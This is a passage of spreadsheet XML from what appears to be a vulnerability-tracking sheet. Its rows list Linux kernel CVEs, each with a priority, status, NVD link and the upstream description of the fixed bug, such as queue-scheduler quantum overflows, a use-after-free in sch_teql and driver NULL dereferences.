      </c>
      <c r="P436" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q436" s="5" t="inlineStr"/>
      <c r="R436" s="5" t="inlineStr"/>
      <c r="S436" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: dapm: Fix off-by-one check on the second enum channel
The snd_soc_dapm_put_enum_double() rejects item[0] once it reaches
e-&gt;items, but it lets item[1] be equal to it.  Both go on to
snd_soc_enum_item_to_val(), which indexes e-&gt;values with no bound of
its own, so an enum with a value table reads one element past the end.
The indexing arrived with the MUX consolidation, which relaxed the
item[1] check in the same hunk.  The value MUX handler it deleted used
&gt;= there, and the snd_soc_put_enum_double() in soc-ops.c still does.
Only adav80x pairs a value table with two shifts, and its second
channel looks accidental, but the control does report two values.
Writing three into it reads off the end of adav80x_mux_values.  The
core catches that only under CONFIG_SND_CTL_INPUT_VALIDATION, which
defaults off.</t>
        </is>
      </c>
      <c r="T436" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90068</t>
        </is>
      </c>
    </row>
    <row r="437">
      <c r="A437" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B437" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C437" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90069</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2026-09-17</t>
        </is>
      </c>
      <c r="P437" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q437" s="5" t="inlineStr"/>
      <c r="R437" s="5" t="inlineStr"/>
      <c r="S437" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: acomp - allocate async request context when cloning
ACOMP_REQUEST_ON_STACK() reserves only enough storage for the
synchronous fallback. When an async implementation is selected, callers
clone that stack request before retrying, but acomp_request_clone()
currently copies only the stack-sized object. The clone therefore has no
storage for the async provider request context, and providers such as QAT
write past the allocation through acomp_request_ctx(). KASAN does report
a slab OOB write.
Allocate a zeroed clone large enough for the runtime acomp request size,
copy only the bytes present in the source object, and preserve the
existing fallback-on-allocation-failure behavior. Use the runtime reqsize
because an implementation may adjust it during tfm initialization.</t>
        </is>
      </c>
      <c r="T437" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90069</t>
        </is>
      </c>
    </row>
    <row r="438">
      <c r="A438" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B438" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C438" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90070</t>
        </is>
      </c>
      <c r="D438" s="5" t="inlineStr"/>
      <c r="E438" s="5" t="inlineStr"/>
      <c r="F438" s="5" t="inlineStr"/>
      <c r="G438" s="5" t="inlineStr"/>
      <c r="H438" s="5" t="inlineStr"/>
      <c r="I438" s="5" t="inlineStr"/>
      <c r="J438" s="5" t="inlineStr"/>
      <c r="K438" s="5" t="inlineStr"/>
      <c r="L438" s="5" t="inlineStr"/>
      <c r="M438" s="5" t="inlineStr"/>
      <c r="N438" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O438" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P438" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q438" s="5" t="inlineStr"/>
      <c r="R438" s="5" t="inlineStr"/>
      <c r="S438" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tpm: st33zp24: Return zero on status read failure
st33zp24_status() ignores the result of the transport read and returns
data even when no byte was received. The I2C transport, for example,
skips i2c_master_recv() when the register-select write is short or fails,
leaving data uninitialized. The resulting stack value can be interpreted
as TPM_STS flags and let status checks complete spuriously.
The status callback cannot propagate a transport error. Return zero
unless recv() reports exactly one byte. With no status bits set, callers
retry or take their existing timeout or error path instead of acting on
an invalid status value.
This issue was found by a static analysis checker and confirmed by manual
source review.</t>
        </is>
      </c>
      <c r="T438" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90070</t>
        </is>
      </c>
    </row>
    <row r="439">
      <c r="A439" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B439" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C439" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90071</t>
        </is>
      </c>
      <c r="D439" s="5" t="inlineStr"/>
      <c r="E439" s="5" t="inlineStr"/>
      <c r="F439" s="5" t="inlineStr"/>
      <c r="G439" s="5" t="inlineStr"/>
      <c r="H439" s="5" t="inlineStr"/>
      <c r="I439" s="5" t="inlineStr"/>
      <c r="J439" s="5" t="inlineStr"/>
      <c r="K439" s="5" t="inlineStr"/>
      <c r="L439" s="5" t="inlineStr"/>
      <c r="M439" s="5" t="inlineStr"/>
      <c r="N439" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O439" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P439" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q439" s="5" t="inlineStr"/>
      <c r="R439" s="5" t="inlineStr"/>
      <c r="S439" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: sch_teql: restore skb-&gt;dev on the slave failure path
teql_master_xmit() sets skb-&gt;dev = slave before calling the slave's
ndo_start_xmit(), but never restores it when that transmit fails. The
skb then walks on to the next slave still pointing at the previous one.
If a later slave has no resolved neighbour, teql_resolve() hands the skb
to neigh_event_send(), which queues it on that neighbour's arp_queue
with the stale skb-&gt;dev. skb-&gt;dev holds no reference, so deleting the
previous slave frees the net_device while the skb is still queued.
Whatever runs next on that skb - arp_error_report() on timeout, or
neigh_direct_output() -&gt; dev_queue_xmit() once the neighbour resolves -
causes a UAF like the one below:
BUG: KASAN: slab-use-after-free in __icmp_send (net/ipv4/icmp.c:914 (discriminator 2))
Read of size 4 at addr ffff888106e100b0 by task flood_packet/527
CPU: 0 UID: 0 PID: 527 Comm: flood_packet Not tainted 7.2.0-rc6-g594d90519502 #1 PREEMPT(lazy)
Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
Call Trace:
&lt;IRQ&gt;
dump_stack_lvl (lib/dump_stack.c:94 lib/dump_stack.c:120)
print_report (mm/kasan/report.c:378 mm/kasan/report.c:482)
? __pfx__raw_spin_lock_irqsave (./include/asm-generic/qrwlock.h:122 (discriminator 4))
? __icmp_send (net/ipv4/icmp.c:914 (discriminator 2))
kasan_report (mm/kasan/report.c:595)
? __icmp_send (net/ipv4/icmp.c:914 (discriminator 2))
__icmp_send (net/ipv4/icmp.c:914 (discriminator 2))
[...]
ipv4_link_failure (net/ipv4/route.c:1251 net/ipv4/route.c:1258)
? __pfx_ipv4_link_failure (./include/linux/skbuff.h:4327)
? _raw_write_lock (./include/linux/instrumented.h:55 ./include/linux/atomic/atomic-instrumented.h:1301 ./include/asm-generic/qrwlock.h:98 ./include/linux/rwlock_api_smp.h:230 kernel/locking/spinlock.c:304)
? __pfx__raw_write_lock (kernel/locking/spinlock.c:175)
arp_error_report (./include/net/dst.h:438 net/ipv4/arp.c:296)
neigh_invalidate (net/core/neighbour.c:1077)
neigh_timer_handler (net/core/neighbour.c:1169)
[...]
Allocated by task 505:
kasan_save_stack (mm/kasan/common.c:57)
kasan_save_track (mm/kasan/common.c:78)
__kasan_kmalloc (mm/kasan/common.c:398 mm/kasan/common.c:415)
__kvmalloc_node_noprof (./include/linux/kasan.h:263 mm/slub.c:5334 mm/slub.c:6905)
alloc_netdev_mqs (net/core/dev.c:12055 (discriminator 2))
rtnl_create_link (net/core/rtnetlink.c:3721)
rtnl_newlink (net/core/rtnetlink.c:3903 net/core/rtnetlink.c:4044 net/core/rtnetlink.c:4159)
rtnetlink_rcv_msg (net/core/rtnetlink.c:7076)
[...]
Freed by task 536:
kasan_save_stack (mm/kasan/common.c:57)
kasan_save_track (mm/kasan/common.c:78)
kasan_save_free_info (mm/kasan/generic.c:584)
__kasan_slab_free (mm/kasan/common.c:253 mm/kasan/common.c:285)
kfree (./include/linux/kasan.h:235 mm/slub.c:2677 mm/slub.c:6377 mm/slub.c:6692)
device_release (drivers/base/core.c:2636)
kobject_put (lib/kobject.c:689 lib/kobject.c:720 ./include/linux/kref.h:65 lib/kobject.c:737)
netdev_run_todo (net/core/dev.c:11756)
rtnl_dellink (net/core/rtnetlink.c:157 ./include/linux/rtnetlink.h:135 net/core/rtnetlink.c:3651)
rtnetlink_rcv_msg (net/core/rtnetlink.c:7076)
[...]
Fix this by restoring skb-&gt;dev to the master at the end of each slave's
iteration.</t>
        </is>
      </c>
      <c r="T439" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90071</t>
        </is>
      </c>
    </row>
    <row r="440">
      <c r="A440" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B440" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C440" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90072</t>
        </is>
      </c>
      <c r="D440" s="5" t="inlineStr"/>
      <c r="E440" s="5" t="inlineStr"/>
      <c r="F440" s="5" t="inlineStr"/>
      <c r="G440" s="5" t="inlineStr"/>
      <c r="H440" s="5" t="inlineStr"/>
      <c r="I440" s="5" t="inlineStr"/>
      <c r="J440" s="5" t="inlineStr"/>
      <c r="K440" s="5" t="inlineStr"/>
      <c r="L440" s="5" t="inlineStr"/>
      <c r="M440" s="5" t="inlineStr"/>
      <c r="N440" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O440" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P440" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q440" s="5" t="inlineStr"/>
      <c r="R440" s="5" t="inlineStr"/>
      <c r="S440" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: sfq: clamp quantum to avoid signed overflow soft lockup
sfq_init() sets q-&gt;quantum = psched_mtu(qdisc_dev(sch)) (unsigned). A
device with a huge MTU (e.g. dummy with max_mtu == 0 accepting MTU
2147483634) makes psched_mtu() return 0x80000000, so slot-&gt;allot = INT_MIN
and INT_MIN + INT_MIN toggles between INT_MIN and 0 forever, spinning
sfq_dequeue() under the qdisc lock.
Clamp the quantum to [256, 1 &lt;&lt; 20] so the refill loop terminates. The
lower bound also covers q-&gt;quantum == 0 (psched_mtu() returning 0),
which spins sfq_dequeue() identically. sfq_change() already rejects a
negative quantum, so only the init path was exposed.
Conditions to recreate the bug: a device whose MTU (plus
hard_header_len) wraps psched_mtu() into the sign bit (e.g. a dummy
device with max_mtu == 0 accepting MTU 2147483634). Requires
CAP_NET_ADMIN in a user namespace.</t>
        </is>
      </c>
      <c r="T440" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90072</t>
        </is>
      </c>
    </row>
    <row r="441">
      <c r="A441" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B441" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C441" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90073</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2026-09-17</t>
        </is>
      </c>
      <c r="P441" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q441" s="5" t="inlineStr"/>
      <c r="R441" s="5" t="inlineStr"/>
      <c r="S441" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: hhf: clamp quantum before hhf_change() to avoid overflow
hhf_init() sets q-&gt;quantum = psched_mtu(qdisc_dev(sch)) with no overflow
check. A device with a huge MTU (e.g. dummy with max_mtu == 0 accepting
MTU 2147483634) makes weight * quantum overflow the signed deficit in
hhf_dequeue(), spinning forever.
Clamp q-&gt;quantum before hhf_change() so both the opt and !opt paths see
a sane quantum. Without this, bare "tc qdisc add ... hhf" succeeds with
a clamped quantum but "tc qdisc add ... hhf limit 1000" (any option
present) fails with -EINVAL because hhf_change() re-validates the
unclamped default (sch_hhf.c:559). 256 matches fq_codel's floor and is
a sane minimum for a DRR quantum.
Conditions to recreate the bug: a device whose MTU (plus
hard_header_len) wraps psched_mtu() into the sign bit (e.g. a dummy
device with max_mtu == 0 accepting MTU 2147483634). Requires
CAP_NET_ADMIN in a user namespace.</t>
        </is>
      </c>
      <c r="T441" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90073</t>
        </is>
      </c>
    </row>
    <row r="442">
      <c r="A442" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B442" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C442" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90074</t>
        </is>
      </c>
      <c r="D442" s="5" t="inlineStr"/>
      <c r="E442" s="5" t="inlineStr"/>
      <c r="F442" s="5" t="inlineStr"/>
      <c r="G442" s="5" t="inlineStr"/>
      <c r="H442" s="5" t="inlineStr"/>
      <c r="I442" s="5" t="inlineStr"/>
      <c r="J442" s="5" t="inlineStr"/>
      <c r="K442" s="5" t="inlineStr"/>
      <c r="L442" s="5" t="inlineStr"/>
      <c r="M442" s="5" t="inlineStr"/>
      <c r="N442" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O442" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P442" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q442" s="5" t="inlineStr"/>
      <c r="R442" s="5" t="inlineStr"/>
      <c r="S442" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: fq_pie: clamp default quantum to avoid signed overflow
fq_pie_init() sets q-&gt;quantum = psched_mtu(qdisc_dev(sch)) without
clamping. A device with a huge MTU (e.g. dummy with max_mtu == 0
accepting MTU 2147483634) makes psched_mtu() return 0x80000000, which
overflows the signed flow-&gt;deficit to INT_MIN in fq_pie_qdisc_dequeue(),
causing an infinite loop and soft lockup. Emulate fq_pie_policy which
is already bounded to [1, 1 &lt;&lt; 20]; clamp the default to [256, 1 &lt;&lt; 20].
256 matches fq_codel's floor and is a sane minimum for a DRR quantum.
Conditions to recreate the bug: a device whose MTU (plus
hard_header_len) wraps psched_mtu() into the sign bit (e.g. a dummy
device with max_mtu == 0 accepting MTU 2147483634). Requires
CAP_NET_ADMIN in a user namespace.</t>
        </is>
      </c>
      <c r="T442" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90074</t>
        </is>
      </c>
    </row>
    <row r="443">
      <c r="A443" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B443" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C443" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90075</t>
        </is>
      </c>
      <c r="D443" s="5" t="inlineStr"/>
      <c r="E443" s="5" t="inlineStr"/>
      <c r="F443" s="5" t="inlineStr"/>
      <c r="G443" s="5" t="inlineStr"/>
      <c r="H443" s="5" t="inlineStr"/>
      <c r="I443" s="5" t="inlineStr"/>
      <c r="J443" s="5" t="inlineStr"/>
      <c r="K443" s="5" t="inlineStr"/>
      <c r="L443" s="5" t="inlineStr"/>
      <c r="M443" s="5" t="inlineStr"/>
      <c r="N443" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O443" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P443" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q443" s="5" t="inlineStr"/>
      <c r="R443" s="5" t="inlineStr"/>
      <c r="S443" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: fq_codel: clamp default quantum and mtu
fq_codel_init() sets q-&gt;quantum = psched_mtu(qdisc_dev(sch)) without
clamping. A device with a huge MTU (e.g. dummy with max_mtu == 0
accepting MTU 2147483634) makes psched_mtu() return 0x80000000, which
overflows the signed flow-&gt;deficit to INT_MIN in fq_codel_dequeue(),
causing an infinite loop and soft lockup. Emulate fq_codel_change()
and constrain to [256, FQ_CODEL_QUANTUM_MAX].
The same unclamped psched_mtu() is assigned to q-&gt;cparams.mtu a bit
below, and fq_codel_change() never updates it. codel_should_drop()
tests "*backlog &lt;= params-&gt;mtu"; with mtu == 0x80000000 (~2 GiB) and
the default 32 MiB memory_limit, the test is always true, so CoDel is
silently and completely disabled (no drops, no ECN). Declare a single
clamped mtu and assign both q-&gt;quantum and q-&gt;cparams.mtu from it,
which also removes the double psched_mtu() call.
Conditions to recreate the bug: a device whose MTU (plus
hard_header_len) wraps psched_mtu() into the sign bit (e.g. a dummy
device with max_mtu == 0 accepting MTU 2147483634). Requires
CAP_NET_ADMIN in a user namespace.</t>
        </is>
      </c>
      <c r="T443" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90075</t>
        </is>
      </c>
    </row>
    <row r="444">
      <c r="A444" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B444" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C444" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90076</t>
        </is>
      </c>
      <c r="D444" s="5" t="inlineStr"/>
      <c r="E444" s="5" t="inlineStr"/>
      <c r="F444" s="5" t="inlineStr"/>
      <c r="G444" s="5" t="inlineStr"/>
      <c r="H444" s="5" t="inlineStr"/>
      <c r="I444" s="5" t="inlineStr"/>
      <c r="J444" s="5" t="inlineStr"/>
      <c r="K444" s="5" t="inlineStr"/>
      <c r="L444" s="5" t="inlineStr"/>
      <c r="M444" s="5" t="inlineStr"/>
      <c r="N444" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O444" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P444" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q444" s="5" t="inlineStr"/>
      <c r="R444" s="5" t="inlineStr"/>
      <c r="S444" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: fq: add overflow bounds to quantum and initial quantum
fq_init() computes quantum = 2 * psched_mtu() and initial_quantum = 10 *
psched_mtu() with no overflow check. A device with a huge MTU (e.g. dummy
with max_mtu == 0 accepting MTU 2147483634) makes psched_mtu() return
0x80000000; the 2 * and 10 * multiplications wrap to 0 in 32-bit
arithmetic, so q-&gt;quantum == 0. Then in fq_dequeue() the credit-refill
loop adds 0 to f-&gt;credit (which stays &lt;= 0) and goto begin loops
forever under the qdisc lock, creating a soft lockup.
Clamp psched_mtu() to [1, 1 &lt;&lt; 20] before multiplying so the product
cannot wrap, then cap the result at 1 &lt;&lt; 20, matching the bound already
enforced on TCA_FQ_QUANTUM in fq_change().
Conditions to recreate the bug: a device whose MTU (plus
hard_header_len) is large enough that 2 * psched_mtu() wraps (e.g. a
dummy device with max_mtu == 0 accepting MTU 2147483634). Requires
CAP_NET_ADMIN in a user namespace.</t>
        </is>
      </c>
      <c r="T444" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90076</t>
        </is>
      </c>
    </row>
    <row r="445">
      <c r="A445" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B445" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C445" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90077</t>
        </is>
      </c>
      <c r="D445" s="5" t="inlineStr"/>
      <c r="E445" s="5" t="inlineStr"/>
      <c r="F445" s="5" t="inlineStr"/>
      <c r="G445" s="5" t="inlineStr"/>
      <c r="H445" s="5" t="inlineStr"/>
      <c r="I445" s="5" t="inlineStr"/>
      <c r="J445" s="5" t="inlineStr"/>
      <c r="K445" s="5" t="inlineStr"/>
      <c r="L445" s="5" t="inlineStr"/>
      <c r="M445" s="5" t="inlineStr"/>
      <c r="N445" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O445" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P445" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q445" s="5" t="inlineStr"/>
      <c r="R445" s="5" t="inlineStr"/>
      <c r="S445" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: fix a resource leak in copy_net_ns() error handling path
Currently, preinit_net() does two things:
  (1) call ns_common_init() which might fail
  (2) initialize resources which does not fail
However, preinit_net() is returning early when (1) fails, and copy_net_ns()
is jumping to the dec_ucounts: label. As a result, resources allocated by
net_alloc() are leaking. We need to call key_remove_domain() and
net_passive_dec() in order to release resources allocated by net_alloc().
We cannot simply jump to the put_userns: label when preinit_net() failed,
for (2) is not yet done. But we can reorder (1) and (2), for there is no
dependency between (1) and (2). Therefore, this patch decouples (1) from
preinit_net() and changes preinit_net() back to a void function, and calls
ns_common_init() after preinit_net() succeeded. Then, we can jump to
immediately after ns_common_free() of the put_userns: label.</t>
        </is>
      </c>
      <c r="T445" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90077</t>
        </is>
      </c>
    </row>
    <row r="446">
      <c r="A446" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B446" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C446" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90078</t>
        </is>
      </c>
      <c r="D446" s="5" t="inlineStr"/>
      <c r="E446" s="5" t="inlineStr"/>
      <c r="F446" s="5" t="inlineStr"/>
      <c r="G446" s="5" t="inlineStr"/>
      <c r="H446" s="5" t="inlineStr"/>
      <c r="I446" s="5" t="inlineStr"/>
      <c r="J446" s="5" t="inlineStr"/>
      <c r="K446" s="5" t="inlineStr"/>
      <c r="L446" s="5" t="inlineStr"/>
      <c r="M446" s="5" t="inlineStr"/>
      <c r="N446" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O446" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P446" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q446" s="5" t="inlineStr"/>
      <c r="R446" s="5" t="inlineStr"/>
      <c r="S446" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: act_skbmod: fix length calculations and avoid invalid header warnings
syzbot reported a warning in skb_network_header_len() triggered
by tcf_skbmod_act():
  !skb_transport_header_was_set(skb)
  WARNING: CPU: 0 PID: 14949 at include/linux/skbuff.h:3243 skb_network_header_len include/linux/skbuff.h:3243 [inline]
  WARNING: CPU: 0 PID: 14949 at net/sched/act_skbmod.c:55 tcf_skbmod_act+0xfe8/0x1810 net/sched/act_skbmod.c:55
There are a few issues in tcf_skbmod_act():
1. Calling skb_network_header_len() assumes skb-&gt;transport_header is set,
   which is not guaranteed when tcf_skbmod_act() runs at TC ingress.
2. Unconditionally calling skb_mac_header_len() at the beginning of
   tcf_skbmod_act() triggers a warning on L3 devices (e.g. TUN) where the
   MAC header is unset, evaluating to an underflowed garbage length.
3. On TC ingress, skb-&gt;data points to the network header. Adding the MAC
   header length to the IP header length causes skb_ensure_writable() to
   request more bytes than the actual IP packet length, dropping valid
   short packets (e.g. 28-byte UDP/IPv4 packets).
Fix these by:
- Using skb_network_offset(skb) + sizeof(struct iphdr/ipv6hdr) for
  SKBMOD_F_ECN so that the required length is correctly calculated on
  both ingress (offset == 0) and egress (offset == mac_len).
- Setting max_edit_len to ETH_HLEN for Ethernet header modifications
  after validating ARPHRD_ETHER.</t>
        </is>
      </c>
      <c r="T446" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90078</t>
        </is>
      </c>
    </row>
    <row r="447">
      <c r="A447" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B447" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C447" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90079</t>
        </is>
      </c>
      <c r="D447" s="5" t="inlineStr"/>
      <c r="E447" s="5" t="inlineStr"/>
      <c r="F447" s="5" t="inlineStr"/>
      <c r="G447" s="5" t="inlineStr"/>
      <c r="H447" s="5" t="inlineStr"/>
      <c r="I447" s="5" t="inlineStr"/>
      <c r="J447" s="5" t="inlineStr"/>
      <c r="K447" s="5" t="inlineStr"/>
      <c r="L447" s="5" t="inlineStr"/>
      <c r="M447" s="5" t="inlineStr"/>
      <c r="N447" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O447" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P447" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q447" s="5" t="inlineStr"/>
      <c r="R447" s="5" t="inlineStr"/>
      <c r="S447" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
octeontx2-af: fix cn20k mailbox lifetime on repeated rvu_mbox_init()
rvu_mbox_init() is called separately for AF-PF mailboxes during probe
and for AF-VF mailboxes when SR-IOV is enabled.  Each call used to
allocate a new ng_rvu object, leaking the first allocation when the
pointer was overwritten on the second call.
Sharing one ng_rvu across both paths exposed several teardown bugs:
the error path freed all cn20k mailbox DMA and kfree()d ng_rvu even
when only the failing init type should be unwound, leaving live AF-PF
mailbox memory in use after an AF-VF init failure.  mutex_init() was
also re-run on the AF-VF path while AF-PF mailbox handlers could still
hold rvu-&gt;mbox_lock.  Probe and SR-IOV failure paths did not release
cn20k mailbox DMA either, since cleanup only happened in rvu_remove().
Allocate ng_rvu once with devm_kzalloc(), initialize mbox_lock in the
same block, unwind only the mailbox memory for the failing init type,
and free cn20k mailbox DMA from the probe and pci_enable_sriov()
error paths.</t>
        </is>
      </c>
      <c r="T447" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90079</t>
        </is>
      </c>
    </row>
    <row r="448">
      <c r="A448" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B448" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C448" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90080</t>
        </is>
      </c>
      <c r="D448" s="5" t="inlineStr"/>
      <c r="E448" s="5" t="inlineStr"/>
      <c r="F448" s="5" t="inlineStr"/>
      <c r="G448" s="5" t="inlineStr"/>
      <c r="H448" s="5" t="inlineStr"/>
      <c r="I448" s="5" t="inlineStr"/>
      <c r="J448" s="5" t="inlineStr"/>
      <c r="K448" s="5" t="inlineStr"/>
      <c r="L448" s="5" t="inlineStr"/>
      <c r="M448" s="5" t="inlineStr"/>
      <c r="N448" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O448" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P448" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q448" s="5" t="inlineStr"/>
      <c r="R448" s="5" t="inlineStr"/>
      <c r="S448" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
octeontx2-pf: fix NULL deref of af_xdp_zc_qidx on rep setup
af_xdp_zc_qidx tracks receive queues using AF_XDP zero-copy and is
allocated during PF/VF probe. Representors and other non-AF_XDP paths
leave the pointer NULL, but several call sites used test_bit() on it
unconditionally.
Switching to devlink eswitch mode creates representors and runs
otx2_init_hw_resources(), which reaches otx2_pool_aq_init() and oopses
when dereferencing the NULL bitmap. Add NULL checks before every
af_xdp_zc_qidx test_bit() use in the RSS, ethtool, XSK, and pool init
paths.</t>
        </is>
      </c>
      <c r="T448" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90080</t>
        </is>
      </c>
    </row>
    <row r="449">
      <c r="A449" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B449" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C449" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90081</t>
        </is>
      </c>
      <c r="D449" s="5" t="inlineStr"/>
      <c r="E449" s="5" t="inlineStr"/>
